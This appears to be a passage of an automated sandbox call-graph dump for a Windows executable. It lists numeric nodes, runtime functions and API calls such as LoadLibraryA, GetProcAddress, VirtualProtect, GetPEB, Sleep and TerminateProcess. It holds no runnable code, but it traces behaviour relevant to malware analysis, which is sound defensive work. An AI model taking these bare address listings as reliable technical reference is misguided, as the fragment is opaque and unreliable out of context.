93850 51e559 93849->93850 93856 517d7c __mtinitlocknum 47 API calls 93849->93856 93858 51e552 93849->93858 93883 514e5b 48 API calls __lock 93849->93883 93884 514ec5 LeaveCriticalSection LeaveCriticalSection _doexit 93849->93884 93885 5169d0 47 API calls __crtGetStringTypeA_stat 93850->93885 93853 51e560 93855 51e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 93853->93855 93853->93858 93854 51e5cc __wsopen_helper 93854->93835 93855->93858 93856->93849 93880 51e5d7 93858->93880 93869 51e600 __wopenfile 93860->93869 93861 51e61a 93890 517c0e 47 API calls __getptd_noexit 93861->93890 93862 51e7d5 93862->93861 93866 51e838 93862->93866 93864 51e61f 93891 516e10 8 API calls __swprintf 93864->93891 93887 5263c9 93866->93887 93867 51354e 93879 513570 LeaveCriticalSection LeaveCriticalSection _fprintf 93867->93879 93869->93861 93869->93862 93892 51185b 59 API calls 3 library calls 93869->93892 93871 51e7ce 93871->93862 93893 51185b 59 API calls 3 library calls 93871->93893 93873 51e7ed 93873->93862 93894 51185b 59 API calls 3 library calls 93873->93894 93875->93832 93876->93841 93877->93841 93878->93841 93879->93841 93886 517e58 LeaveCriticalSection 93880->93886 93882 51e5de 93882->93854 93883->93849 93884->93849 93885->93853 93886->93882 93895 525bb1 93887->93895 93889 5263e2 93889->93867 93890->93864 93891->93867 93892->93871 93893->93873 93894->93862 93898 525bbd __wsopen_helper 93895->93898 93896 525bcf 93897 517c0e __fseek_nolock 47 API calls 93896->93897 93899 525bd4 93897->93899 93898->93896 93900 525c06 93898->93900 93901 516e10 __swprintf 8 API calls 93899->93901 93902 525c78 __wsopen_helper 110 API calls 93900->93902 93905 525bde __wsopen_helper 93901->93905 93903 525c23 93902->93903 93904 525c4c __wsopen_helper LeaveCriticalSection 93903->93904 93904->93905 93905->93889 93910 4f42f6 93906->93910 93909 4f42cc LoadLibraryA GetProcAddress 93909->93783 93911 4f42aa 93910->93911 93912 4f42ff LoadLibraryA 93910->93912 93911->93783 93911->93909 93912->93911 93913 4f4310 GetProcAddress 93912->93913 93913->93911 93915 50f4ea 48 API calls 93914->93915 93916 4f47c9 93915->93916 93916->93791 93918 4f4085 FindResourceExW 93917->93918 93922 4f40a2 93917->93922 93919 564f16 LoadResource 93918->93919 93918->93922 93920 564f2b SizeofResource 93919->93920 93919->93922 93921 564f3f LockResource 93920->93921 93920->93922 93921->93922 93922->93792 93924 564fe0 93923->93924 93925 4f4526 93923->93925 93929 513a8d 93925->93929 93927 4f4534 93927->93803 93928->93792 93930 513a99 __wsopen_helper 93929->93930 93931 513aa7 93930->93931 93933 513acd 93930->93933 93942 517c0e 47 API calls __getptd_noexit 93931->93942 93935 514e1c __lock_file 48 API calls 93933->93935 93934 513aac 93943 516e10 8 API calls __swprintf 93934->93943 93937 513ad3 93935->93937 93944 5139fe 81 API calls 3 library calls 93937->93944 93939 513ae2 93945 513b04 LeaveCriticalSection LeaveCriticalSection _fprintf 93939->93945 93941 513ab7 __wsopen_helper 93941->93927 93942->93934 93943->93941 93944->93939 93945->93941 93949 513839 93946->93949 93948 4f4510 93948->93811 93950 513845 __wsopen_helper 93949->93950 93951 513880 __wsopen_helper 93950->93951 93952 513888 93950->93952 93953 51385b _memset 93950->93953 93951->93948 93954 514e1c __lock_file 48 API calls 93952->93954 93962 517c0e 47 API calls __getptd_noexit 93953->93962 93956 51388e 93954->93956 93964 51365b 62 API calls 6 library calls 93956->93964 93957 513875 93963 516e10 8 API calls __swprintf 93957->93963 93960 5138a4 93965 5138c2 LeaveCriticalSection LeaveCriticalSection _fprintf 93960->93965 93962->93957 93963->93951 93964->93960 93965->93951 93969 51344a GetSystemTimeAsFileTime 93966->93969 93968 53bdc3 93968->93813 93970 513478 __aulldiv 93969->93970 93970->93968 93972 513e71 __wsopen_helper 93971->93972 93973 513e94 93972->93973 93974 513e7f 93972->93974 93975 514e1c __lock_file 48 API calls 93973->93975 93985 517c0e 47 API calls __getptd_noexit 93974->93985 93977 513e9a 93975->93977 93987 513b0c 55 API calls 5 library calls 93977->93987 93978 513e84 93986 516e10 8 API calls __swprintf 93978->93986 93981 513ea5 93988 513ec5 LeaveCriticalSection LeaveCriticalSection _fprintf 93981->93988 93983 513eb7 93984 513e8f __wsopen_helper 93983->93984 93984->93818 93985->93978 93986->93984 93987->93981 93988->93983 93990 511e55 93989->93990 93991 511e61 93989->93991 93990->93991 94004 511ed4 93990->94004 94008 519d6b 47 API calls 2 library calls 93990->94008 94013 517c0e 47 API calls __getptd_noexit 93991->94013 93993 512019 93998 511e41 93993->93998 94014 516e10 8 API calls __swprintf 93993->94014 93996 511fa0 93996->93991 93996->93998 94000 511fb0 93996->94000 93997 511f5f 93997->93991 93999 511f7b 93997->93999 94010 519d6b 47 API calls 2 library calls 93997->94010 93998->93271 93999->93991 93999->93998 94003 511f91 93999->94003 94012 519d6b 47 API calls 2 library calls 94000->94012 94011 519d6b 47 API calls 2 library calls 94003->94011 94004->93991 94007 511f41 94004->94007 94009 519d6b 47 API calls 2 library calls 94004->94009 94007->93996 94007->93997 94008->94004 94009->94007 94010->93999 94011->93998 94012->93998 94013->93993 94014->93998 94015->93749 94017 512aba __wsopen_helper 94016->94017 94018 512ad4 94017->94018 94019 512aec 94017->94019 94021 512ae4 __wsopen_helper 94017->94021 94051 517c0e 47 API calls __getptd_noexit 94018->94051 94022 514e1c __lock_file 48 API calls 94019->94022 94021->93761 94024 512af2 94022->94024 94023 512ad9 94052 516e10 8 API calls __swprintf 94023->94052 94039 512957 94024->94039 94030 53c715 94029->94030 94031 53c6ff SetFileTime CloseHandle 94029->94031 94030->93729 94031->94030 94037 53c581 __tzset_nolock _wcscmp 94032->94037 94033 53c05f 94033->93727 94033->93729 94034 4f44ed 64 API calls 94034->94037 94035 53bf5a GetSystemTimeAsFileTime 94035->94037 94036 4f4517 83 API calls 94036->94037 94037->94033 94037->94034 94037->94035 94037->94036 94038->93765 94042 512966 94039->94042 94045 512984 94039->94045 94040 512974 94054 517c0e 47 API calls __getptd_noexit 94040->94054 94042->94040 94042->94045 94048 51299c _memcpy_s 94042->94048 94043 512979 94055 516e10 8 API calls __swprintf 94043->94055 94053 512b24 LeaveCriticalSection LeaveCriticalSection _fprintf 94045->94053 94047 512c84 __flush 78 API calls 94047->94048 94048->94045 94048->94047 94049 512933 __fseek_nolock 47 API calls 94048->94049 94050 51af61 __flswbuf 78 API calls 94048->94050 94056 518e63 78 API calls 4 library calls 94048->94056 94049->94048 94050->94048 94051->94023 94052->94021 94053->94021 94054->94043 94055->94045 94056->94048 94057->93013 94058->93013 94059->93015 94060->93015 94061->93008 94062->93003 94063->93016 94064->93028 94065->93028 94066->93029 94067->93046 94068->93051 94069 53bb64 94070 53bb71 94069->94070 94071 53bb77 94069->94071 94073 511c9d _free 47 API calls 94070->94073 94072 53bb88 94071->94072 94074 511c9d _free 47 API calls 94071->94074 94075 511c9d _free 47 API calls 94072->94075 94076 53bb9a 94072->94076 94073->94071 94074->94072 94075->94076 94077 15f76f8 94091 15f5348 94077->94091 94079 15f77f5 94094 15f75e8 94079->94094 94097 15f8818 GetPEB 94091->94097 94093 15f59d3 94093->94079 94095 15f75f1 Sleep 94094->94095 94096 15f75ff 94095->94096 94098 15f8842 94097->94098 94098->94093 94099 569bec 94135 500ae0 _memcpy_s Mailbox 94099->94135 94104 50f4ea 48 API calls 94130 4ffec8 94104->94130 94105 500509 94159 53cc5c 86 API calls 4 library calls 94105->94159 94106 50146e 94111 4f6eed 48 API calls 94106->94111 94108 4f6eed 48 API calls 94108->94130 94109 501473 94158 53cc5c 86 API calls 4 library calls 94109->94158 94128 4fffe1 Mailbox 94111->94128 94113 56a246 94117 4f6eed 48 API calls 94113->94117 94114 56a922 94117->94128 94118 56a873 94119 4fd7f7 48 API calls 94119->94130 94120 56a30e 94120->94128 94154 5297ed InterlockedDecrement 94120->94154 94121 510f0a 52 API calls __cinit 94121->94130 94122 4fce19 48 API calls 94122->94135 94123 5297ed InterlockedDecrement 94123->94130 94125 56a973 94160 53cc5c 86 API calls 4 library calls 94125->94160 94127 56a982 94129 5015b5 94157 53cc5c 86 API calls 4 library calls 94129->94157 94130->94104 94130->94105 94130->94106 94130->94108 94130->94109 94130->94113 94130->94119 94130->94120 94130->94121 94130->94123 94130->94125 94130->94128 94130->94129 94148 501820 335 API calls 2 library calls 94130->94148 94149 501d10 59 API calls Mailbox 94130->94149 94132 50f4ea 48 API calls 94132->94135 94133 4ffe30 335 API calls 94133->94135 94134 501526 Mailbox 94156 53cc5c 86 API calls 4 library calls 94134->94156 94135->94122 94135->94128 94135->94130 94135->94132 94135->94133 94135->94134 94136 56a706 94135->94136 94138 5297ed InterlockedDecrement 94135->94138 94139 546ff0 335 API calls 94135->94139 94142 550d09 94135->94142 94145 550d1d 94135->94145 94150 54ef61 82 API calls 2 library calls 94135->94150 94151 54f0ac 90 API calls Mailbox 94135->94151 94152 53a6ef 48 API calls 94135->94152 94153 54e822 335 API calls Mailbox 94135->94153 94155 53cc5c 86 API calls 4 library calls 94136->94155 94138->94135 94139->94135 94161 54f8ae 94142->94161 94144 550d19 94144->94135 94146 54f8ae 129 API calls 94145->94146 94147 550d2d 94146->94147 94147->94135 94148->94130 94149->94130 94150->94135 94151->94135 94152->94135 94153->94135 94154->94128 94155->94134 94156->94128 94157->94128 94158->94118 94159->94114 94160->94127 94162 4f936c 81 API calls 94161->94162 94163 54f8ea 94162->94163 94185 54f92c Mailbox 94163->94185 94197 550567 94163->94197 94165 54fb8b 94166 54fcfa 94165->94166 94170 54fb95 94165->94170 94244 550688 89 API calls Mailbox 94166->94244 94169 54fd07 94169->94170 94171 54fd13 94169->94171 94210 54f70a 94170->94210 94171->94185 94172 4f936c 81 API calls 94191 54f984 Mailbox 94172->94191 94177 54fbc9 94224 50ed18 94177->94224 94180 54fbe3 94230 53cc5c 86 API calls 4 library calls 94180->94230 94181 54fbfd 94231 50c050 94181->94231 94184 54fbee GetCurrentProcess TerminateProcess 94184->94181 94185->94144 94186 54fc14 94188 501b90 48 API calls 94186->94188 94196 54fc3e 94186->94196 94187 54fd65 94187->94185 94193 54fd7e FreeLibrary 94187->94193 94189 54fc2d 94188->94189 94242 55040f 105 API calls _free 94189->94242 94190 501b90 48 API calls 94190->94196 94191->94165 94191->94172 94191->94185 94191->94191 94228 5529e8 48 API calls _memcpy_s 94191->94228 94229 54fda5 60 API calls 2 library calls 94191->94229 94193->94185 94196->94187 94196->94190 94243 4fdcae 50 API calls Mailbox 94196->94243 94245 55040f 105 API calls _free 94196->94245 94198 4fbdfa 48 API calls 94197->94198 94199 550582 CharLowerBuffW 94198->94199 94246 531f11 94199->94246 94203 4fd7f7 48 API calls 94204 5505bb 94203->94204 94253 4f69e9 48 API calls _memcpy_s 94204->94253 94206 5505d2 94254 4fb18b 94206->94254 94207 55061a Mailbox 94207->94191 94209 5505de Mailbox 94209->94207 94258 54fda5 60 API calls 2 library calls 94209->94258 94211 54f725 94210->94211 94212 54f77a 94210->94212 94213 50f4ea 48 API calls 94211->94213 94216 550828 94212->94216 94215 54f747 94213->94215 94214 50f4ea 48 API calls 94214->94215 94215->94212 94215->94214 94217 550a53 Mailbox 94216->94217 94223 55084b _strcat _wcscpy __NMSG_WRITE 94216->94223 94217->94177 94218 4fcf93 58 API calls 94218->94223 94219 4fd286 48 API calls 94219->94223 94220 4f936c 81 API calls 94220->94223 94221 51395c 47 API calls __crtGetStringTypeA_stat 94221->94223 94223->94217 94223->94218 94223->94219 94223->94220 94223->94221 94261 538035 50 API calls __NMSG_WRITE 94223->94261 94226 50ed2d 94224->94226 94225 50edc5 VirtualProtect 94227 50ed93 94225->94227 94226->94225 94226->94227 94227->94180 94227->94181 94228->94191 94229->94191 94230->94184 94232 50c064 94231->94232 94234 50c069 Mailbox 94231->94234 94262 50c1af 48 API calls 94232->94262 94240 50c077 94234->94240 94263 50c15c 48 API calls 94234->94263 94236 50f4ea 48 API calls 94237 50c108 94236->94237 94239 50f4ea 48 API calls 94237->94239 94238 50c152 94238->94186 94241 50c113 94239->94241 94240->94236 94240->94238 94241->94186 94241->94241 94242->94196 94243->94196 94244->94169 94245->94196 94247 531f3b __NMSG_WRITE 94246->94247 94248 531f79 94247->94248 94249 531f6f 94247->94249 94251 531ffa 94247->94251 94248->94203 94248->94209 94249->94248 94259 50d37a 60 API calls 94249->94259 94251->94248 94260 50d37a 60 API calls 94251->94260 94253->94206 94255 4fb199 94254->94255 94257 4fb1a2 _memcpy_s 94254->94257 94256 4fbdfa 48 API calls 94255->94256 94255->94257 94256->94257 94257->94209 94258->94207 94259->94249 94260->94251 94261->94223 94262->94234 94263->94240 94264 5619dd 94269 4f4a30 94264->94269 94266 5619f1 94289 510f0a 52 API calls __cinit 94266->94289 94268 5619fb 94270 4f4a40 __ftell_nolock 94269->94270 94271 4fd7f7 48 API calls 94270->94271 94272 4f4af6 94271->94272 94290 4f5374 94272->94290 94274 4f4aff 94297 4f363c 94274->94297 94281 4fd7f7 48 API calls 94282 4f4b32 94281->94282 94319 4f49fb 94282->94319 94284 4f61a6 48 API calls 94288 4f4b3d _wcscat Mailbox __NMSG_WRITE 94284->94288 94285 4f4b43 Mailbox 94285->94266 94286 4fce19 48 API calls 94286->94288 94287 4f64cf 48 API calls 94287->94288 94288->94284 94288->94285 94288->94286 94288->94287 94289->94268 94333 51f8a0 94290->94333 94293 4fce19 48 API calls 94294 4f53a7 94293->94294 94335 4f660f 94294->94335 94296 4f53b1 Mailbox 94296->94274 94298 4f3649 __ftell_nolock 94297->94298 94358 4f366c GetFullPathNameW 94298->94358 94300 4f365a 94301 4f6a63 48 API calls 94300->94301 94302 4f3669 94301->94302 94303 4f518c 94302->94303 94304 4f5197 94303->94304 94305 4f519f 94304->94305 94306 561ace 94304->94306 94360 4f5130 94305->94360 94307 4f6b4a 48 API calls 94306->94307 94310 561adb __NMSG_WRITE 94307->94310 94309 4f4b18 94313 4f64cf 94309->94313 94311 50ee75 48 API calls 94310->94311 94312 561b07 _memcpy_s 94311->94312 94314 4f651b 94313->94314 94318 4f64dd _memcpy_s 94313->94318 94316 50f4ea 48 API calls 94314->94316 94315 50f4ea 48 API calls 94317 4f4b29 94315->94317 94316->94318 94317->94281 94318->94315 94370 4fbcce 94319->94370 94322 4f4a2b 94322->94288 94323 5641cc RegQueryValueExW 94324 564246 RegCloseKey 94323->94324 94325 5641e5 94323->94325 94326 50f4ea 48 API calls 94325->94326 94327 5641fe 94326->94327 94328 4f47b7 48 API calls 94327->94328 94329 564208 RegQueryValueExW 94328->94329 94330 564224 94329->94330 94331 56423b 94329->94331 94332 4f6a63 48 API calls 94330->94332 94331->94324 94332->94331 94334 4f5381 GetModuleFileNameW 94333->94334 94334->94293 94336 51f8a0 __ftell_nolock 94335->94336 94337 4f661c GetFullPathNameW 94336->94337 94342 4f6a63 94337->94342 94339 4f6643 94353 4f6571 94339->94353 94343 4f6adf 94342->94343 94345 4f6a6f __NMSG_WRITE 94342->94345 94344 4fb18b 48 API calls 94343->94344 94351 4f6ab6 _memcpy_s 94344->94351 94346 4f6a8b 94345->94346 94347 4f6ad7 94345->94347 94349 4f6b4a 48 API calls 94346->94349 94357 4fc369 48 API calls 94347->94357 94350 4f6a95 94349->94350 94352 50ee75 48 API calls 94350->94352 94351->94339 94352->94351 94354 4f657f 94353->94354 94355 4fb18b 48 API calls 94354->94355 94356 4f658f 94355->94356 94356->94296 94357->94351 94359 4f368a 94358->94359 94359->94300 94361 4f513f __NMSG_WRITE 94360->94361 94362 561b27 94361->94362 94363 4f5151 94361->94363 94365 4f6b4a 48 API calls 94362->94365 94364 4fbb85 48 API calls 94363->94364 94366 4f515e _memcpy_s 94364->94366 94367 561b34 94365->94367 94366->94309 94368 50ee75 48 API calls 94367->94368 94369 561b57 _memcpy_s 94368->94369 94371 4fbce8 94370->94371 94375 4f4a0a RegOpenKeyExW 94370->94375 94372 50f4ea 48 API calls 94371->94372 94373 4fbcf2 94372->94373 94374 50ee75 48 API calls 94373->94374 94374->94375 94375->94322 94375->94323 94376 515dfd 94377 515e09 __wsopen_helper 94376->94377 94413 517eeb GetStartupInfoW 94377->94413 94379 515e0e 94415 519ca7 GetProcessHeap 94379->94415 94381 515e66 94382 515e71 94381->94382 94500 515f4d 47 API calls 3 library calls 94381->94500 94416 517b47 94382->94416 94385 515e77 94387 515e82 __RTC_Initialize 94385->94387 94501 515f4d 47 API calls 3 library calls 94385->94501 94437 51acb3 94387->94437 94389 515e91 94390 515e9d GetCommandLineW 94389->94390 94502 515f4d 47 API calls 3 library calls 94389->94502 94456 522e7d GetEnvironmentStringsW 94390->94456 94393 515e9c 94393->94390 94397 515ec2 94469 522cb4 94397->94469 94400 515ec8 94401 515ed3 94400->94401 94504 51115b 47 API calls 3 library calls 94400->94504 94483 511195 94401->94483 94404 515edb 94405 515ee6 __wwincmdln 94404->94405 94505 51115b 47 API calls 3 library calls 94404->94505 94487 4f3a0f 94405->94487 94408 515efa 94409 515f09 94408->94409 94506 5113f1 47 API calls _doexit 94408->94506 94507 511186 47 API calls _doexit 94409->94507 94412 515f0e __wsopen_helper 94414 517f01 94413->94414 94414->94379 94415->94381 94508 51123a 30 API calls 2 library calls 94416->94508 94418 517b4c 94509 517e23 InitializeCriticalSectionAndSpinCount 94418->94509 94420 517b51 94421 517b55 94420->94421 94511 517e6d TlsAlloc 94420->94511 94510 517bbd 50 API calls 2 library calls 94421->94510 94424 517b5a 94424->94385 94425 517b67 94425->94421 94426 517b72 94425->94426 94512 516986 94426->94512 94429 517bb4 94520 517bbd 50 API calls 2 library calls 94429->94520 94432 517b93 94432->94429 94434 517b99 94432->94434 94433 517bb9 94433->94385 94519 517a94 47 API calls 4 library calls 94434->94519 94436 517ba1 GetCurrentThreadId 94436->94385 94438 51acbf __wsopen_helper 94437->94438 94439 517cf4 __lock 47 API calls 94438->94439 94440 51acc6 94439->94440 94441 516986 __calloc_crt 47 API calls 94440->94441 94442 51acd7 94441->94442 94443 51ad42 GetStartupInfoW 94442->94443 94444 51ace2 __wsopen_helper @_EH4_CallFilterFunc@8 94442->94444 94451 51ae80 94443->94451 94453 51ad57 94443->94453 94444->94389 94445 51af44 94529 51af58 LeaveCriticalSection _doexit 94445->94529 94447 51aec9 GetStdHandle 94447->94451 94448 516986 __calloc_crt 47 API calls 94448->94453 94449 51aedb GetFileType 94449->94451 94450 51ada5 94450->94451 94454 51ade5 InitializeCriticalSectionAndSpinCount 94450->94454 94455 51add7 GetFileType 94450->94455 94451->94445 94451->94447 94451->94449 94452 51af08 InitializeCriticalSectionAndSpinCount 94451->94452 94452->94451 94453->94448 94453->94450 94453->94451 94454->94450 94455->94450 94455->94454 94457 515ead 94456->94457 94458 522e8e 94456->94458 94463 522a7b GetModuleFileNameW 94457->94463 94530 5169d0 47 API calls __crtGetStringTypeA_stat 94458->94530 94461 522eca FreeEnvironmentStringsW 94461->94457 94462 522eb4 _memcpy_s 94462->94461 94465 522aaf _wparse_cmdline 94463->94465 94464 515eb7 94464->94397 94503 51115b 47 API calls 3 library calls 94464->94503 94465->94464 94466 522ae9 94465->94466 94531 5169d0 47 API calls __crtGetStringTypeA_stat 94466->94531 94468 522aef _wparse_cmdline 94468->94464 94470 522ccd __NMSG_WRITE 94469->94470 94474 522cc5 94469->94474 94471 516986 __calloc_crt 47 API calls 94470->94471 94479 522cf6 __NMSG_WRITE 94471->94479 94472 522d4d 94473 511c9d _free 47 API calls 94472->94473 94473->94474 94474->94400 94475 516986 __calloc_crt 47 API calls 94475->94479 94476 522d72 94478 511c9d _free 47 API calls 94476->94478 94478->94474 94479->94472 94479->94474 94479->94475 94479->94476 94480 522d89 94479->94480 94532 522567 47 API calls 2 library calls 94479->94532 94533 516e20 IsProcessorFeaturePresent 94480->94533 94482 522d95 94482->94400 94484 5111a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 94483->94484 94486 5111e0 __IsNonwritableInCurrentImage 94484->94486 94548 510f0a 52 API calls __cinit 94484->94548 94486->94404 94488 4f3a29 94487->94488 94489 561ebf 94487->94489 94490 4f3a63 IsThemeActive 94488->94490 94549 511405 94490->94549 94494 4f3a8f 94561 4f3adb SystemParametersInfoW SystemParametersInfoW 94494->94561 94496 4f3a9b 94562 4f3d19 94496->94562 94498 4f3aa3 SystemParametersInfoW 94499 4f3ac8 94498->94499 94499->94408 94500->94382 94501->94387 94502->94393 94506->94409 94507->94412 94508->94418 94509->94420 94510->94424 94511->94425 94514 51698d 94512->94514 94515 5169ca 94514->94515 94516 5169ab Sleep 94514->94516 94521 5230aa 94514->94521 94515->94429 94518 517ec9 TlsSetValue 94515->94518 94517 5169c2 94516->94517 94517->94514 94517->94515 94518->94432 94519->94436 94520->94433 94522 5230b5 94521->94522 94525 5230d0 __calloc_impl 94521->94525 94523 5230c1 94522->94523 94522->94525 94528 517c0e 47 API calls __getptd_noexit 94523->94528 94524 5230e0 HeapAlloc 94524->94525 94527 5230c6 94524->94527 94525->94524 94525->94527 94527->94514 94528->94527 94529->94444 94530->94462 94531->94468 94532->94479 94534 516e2b 94533->94534 94539 516cb5 94534->94539 94538 516e46 94538->94482 94540 516ccf _memset __call_reportfault 94539->94540 94541 516cef IsDebuggerPresent 94540->94541 94547 5181ac SetUnhandledExceptionFilter UnhandledExceptionFilter 94541->94547 94543 51a70c __fltout2 6 API calls 94544 516dd6 94543->94544 94546 518197 GetCurrentProcess TerminateProcess 94544->94546 94545 516db3 __call_reportfault 94545->94543 94546->94538 94547->94545 94548->94486 94550 517cf4 __lock 47 API calls 94549->94550 94551 511410 94550->94551 94614 517e58 LeaveCriticalSection 94551->94614 94553 4f3a88 94554 51146d 94553->94554 94555 511491 94554->94555 94556 511477 94554->94556 94555->94494 94556->94555 94615 517c0e 47 API calls __getptd_noexit 94556->94615 94558 511481 94616 516e10 8 API calls __swprintf 94558->94616 94560 51148c 94560->94494 94561->94496 94563 4f3d26 __ftell_nolock 94562->94563 94564 4fd7f7 48 API calls 94563->94564 94565 4f3d31 GetCurrentDirectoryW 94564->94565 94617 4f61ca 94565->94617 94567 4f3d57 IsDebuggerPresent 94568 561cc1 MessageBoxA 94567->94568 94569 4f3d65 94567->94569 94571 561cd9 94568->94571 94569->94571 94572 4f3d82 94569->94572 94601 4f3e3a 94569->94601 94570 4f3e41 SetCurrentDirectoryW 94573 4f3e4e Mailbox 94570->94573 94742 50c682 48 API calls 94571->94742 94691 4f40e5 94572->94691 94573->94498 94576 561ce9 94581 561cff SetCurrentDirectoryW 94576->94581 94578 4f3da0 GetFullPathNameW 94579 4f6a63 48 API calls 94578->94579 94580 4f3ddb 94579->94580 94707 4f6430 94580->94707 94581->94573 94584 4f3df6 94585 4f3e00 94584->94585 94743 5371fa AllocateAndInitializeSid CheckTokenMembership FreeSid 94584->94743 94723 4f3e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 94585->94723 94588 561d1c 94588->94585 94591 561d2d 94588->94591 94593 4f5374 50 API calls 94591->94593 94592 4f3e0a 94594 4f3e1f 94592->94594 94731 4f4ffc 94592->94731 94595 561d35 94593->94595 94597 4fe8d0 335 API calls 94594->94597 94598 4fce19 48 API calls 94595->94598 94599 4f3e2a 94597->94599 94600 561d42 94598->94600 94599->94601 94741 4f3847 Shell_NotifyIconW _memset 94599->94741 94603 561d6e 94600->94603 94604 561d49 94600->94604 94601->94570 94605 4f518c 48 API calls 94603->94605 94606 4f518c 48 API calls 94604->94606 94607 561d6a GetForegroundWindow ShellExecuteW 94605->94607 94608 561d54 94606->94608 94611 561d9e Mailbox 94607->94611 94744 4f510d 94608->94744 94611->94601 94613 4f518c 48 API calls 94613->94607 94614->94553 94615->94558 94616->94560 94753 50e99b 94617->94753 94621 4f61eb 94622 4f5374 50 API calls 94621->94622 94623 4f61ff 94622->94623 94624 4fce19 48 API calls 94623->94624 94625 4f620c 94624->94625 94770 4f39db 94625->94770 94627 4f6216 Mailbox 94628 4f6eed 48 API calls 94627->94628 94629 4f622b 94628->94629 94782 4f9048 94629->94782 94632 4fce19 48 API calls 94633 4f6244 94632->94633 94634 4fd6e9 55 API calls 94633->94634 94635 4f6254 Mailbox 94634->94635 94636 4fce19 48 API calls 94635->94636 94637 4f627c 94636->94637 94638 4fd6e9 55 API calls 94637->94638 94639 4f628f Mailbox 94638->94639 94640 4fce19 48 API calls 94639->94640 94641 4f62a0 94640->94641 94642 4fd645 53 API calls 94641->94642 94643 4f62b2 Mailbox 94642->94643 94644 4fd7f7 48 API calls 94643->94644 94645 4f62c5 94644->94645 94785 4f63fc 94645->94785 94649 4f62df 94650 4f62e9 94649->94650 94651 561c08 94649->94651 94653 510fa7 _W_store_winword 59 API calls 94650->94653 94652 4f63fc 48 API calls 94651->94652 94654 561c1c 94652->94654 94655 4f62f4 94653->94655 94657 4f63fc 48 API calls 94654->94657 94655->94654 94656 4f62fe 94655->94656 94658 510fa7 _W_store_winword 59 API calls 94656->94658 94659 561c38 94657->94659 94660 4f6309 94658->94660 94662 4f5374 50 API calls 94659->94662 94660->94659 94661 4f6313 94660->94661 94663 510fa7 _W_store_winword 59 API calls 94661->94663 94665 561c5d 94662->94665 94664 4f631e 94663->94664 94666 4f635f 94664->94666 94668 561c86 94664->94668 94671 4f63fc 48 API calls 94664->94671 94667 4f63fc 48 API calls 94665->94667 94666->94668 94669 4f636c 94666->94669 94670 561c69 94667->94670 94672 4f6eed 48 API calls 94668->94672 94676 50c050 48 API calls 94669->94676 94673 4f6eed 48 API calls 94670->94673 94674 4f6342 94671->94674 94675 561ca8 94672->94675 94677 561c77 94673->94677 94678 4f6eed 48 API calls 94674->94678 94679 4f63fc 48 API calls 94675->94679 94680 4f6384 94676->94680 94681 4f63fc 48 API calls 94677->94681 94682 4f6350 94678->94682 94683 561cb5 94679->94683 94684 501b90 48 API calls 94680->94684 94681->94668 94685 4f63fc 48 API calls 94682->94685 94683->94683 94688 4f6394 94684->94688 94685->94666 94686 501b90 48 API calls 94686->94688 94688->94686 94689 4f63fc 48 API calls 94688->94689 94690 4f63d6 Mailbox 94688->94690 94801 4f6b68 48 API calls 94688->94801 94689->94688 94690->94567 94692 4f40f2 __ftell_nolock 94691->94692 94693 4f410b 94692->94693 94694 56370e _memset 94692->94694 94695 4f660f 49 API calls 94693->94695 94696 56372a GetOpenFileNameW 94694->94696 94697 4f4114 94695->94697 94698 563779 94696->94698 94844 4f40a7 94697->94844 94701 4f6a63 48 API calls 94698->94701 94703 56378e 94701->94703 94703->94703 94704 4f4129 94862 4f4139 94704->94862 94708 4f643d __ftell_nolock 94707->94708 95035 4f4c75 94708->95035 94710 4f6442 94711 4f3dee 94710->94711 95046 4f5928 86 API calls 94710->95046 94711->94576 94711->94584 94713 4f644f 94713->94711 95047 4f5798 88 API calls Mailbox 94713->95047 94715 4f6458 94715->94711 94716 4f645c GetFullPathNameW 94715->94716 94717 4f6a63 48 API calls 94716->94717 94718 4f6488 94717->94718 94719 4f6a63 48 API calls 94718->94719 94720 4f6495 94719->94720 94721 565dcf _wcscat 94720->94721 94722 4f6a63 48 API calls 94720->94722 94722->94711 94724 4f3ed8 94723->94724 94725 561cba 94723->94725 95049 4f4024 94724->95049 94729 4f3e05 94730 4f36b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 94729->94730 94730->94592 94732 4f5027 _memset 94731->94732 95054 4f4c30 94732->95054 94736 4f50ca Shell_NotifyIconW 95058 4f51af 94736->95058 94737 563d28 Shell_NotifyIconW 94739 4f50ac 94739->94736 94739->94737 94740 4f50df 94740->94594 94741->94601 94742->94576 94743->94588 94745 4f511f 94744->94745 94746 561be7 94744->94746 95081 4fb384 94745->95081 95090 52a58f 48 API calls _memcpy_s 94746->95090 94749 561bf1 94751 4f6eed 48 API calls 94749->94751 94750 4f512b 94750->94613 94752 561bf9 Mailbox 94751->94752 94754 4fd7f7 48 API calls 94753->94754 94755 4f61db 94754->94755 94756 4f6009 94755->94756 94757 4f6016 __ftell_nolock 94756->94757 94758 4f6a63 48 API calls 94757->94758 94763 4f617c Mailbox 94757->94763 94760 4f6048 94758->94760 94768 4f607e Mailbox 94760->94768 94802 4f61a6 94760->94802 94761 4f61a6 48 API calls 94761->94768 94762 4f614f 94762->94763 94764 4fce19 48 API calls 94762->94764 94763->94621 94766 4f6170 94764->94766 94765 4fce19 48 API calls 94765->94768 94767 4f64cf 48 API calls 94766->94767 94767->94763 94768->94761 94768->94762 94768->94763 94768->94765 94769 4f64cf 48 API calls 94768->94769 94769->94768 94771 4f41a9 136 API calls 94770->94771 94772 4f39fe 94771->94772 94773 4f3a06 94772->94773 94805 53c396 94772->94805 94773->94627 94775 562ff0 94778 511c9d _free 47 API calls 94775->94778 94777 4f4252 84 API calls 94777->94775 94779 562ffd 94778->94779 94780 4f4252 84 API calls 94779->94780 94781 563006 94780->94781 94781->94781 94783 50f4ea 48 API calls 94782->94783 94784 4f6237 94783->94784 94784->94632 94786 4f641f 94785->94786 94787 4f6406 94785->94787 94789 4f6a63 48 API calls 94786->94789 94788 4f6eed 48 API calls 94787->94788 94790 4f62d1 94788->94790 94789->94790 94791 510fa7 94790->94791 94792 510fb3 94791->94792 94793 511028 94791->94793 94800 510fd8 94792->94800 94841 517c0e 47 API calls __getptd_noexit 94792->94841 94843 51103a 59 API calls 4 library calls 94793->94843 94796 511035 94796->94649 94797 510fbf 94842 516e10 8 API calls __swprintf 94797->94842 94799 510fca 94799->94649 94800->94649 94801->94688 94803 4fbdfa 48 API calls 94802->94803 94804 4f61b1 94803->94804 94804->94760 94806 4f4517 83 API calls 94805->94806 94807 53c405 94806->94807 94808 53c56d 94 API calls 94807->94808 94809 53c417 94808->94809 94810 4f44ed 64 API calls 94809->94810 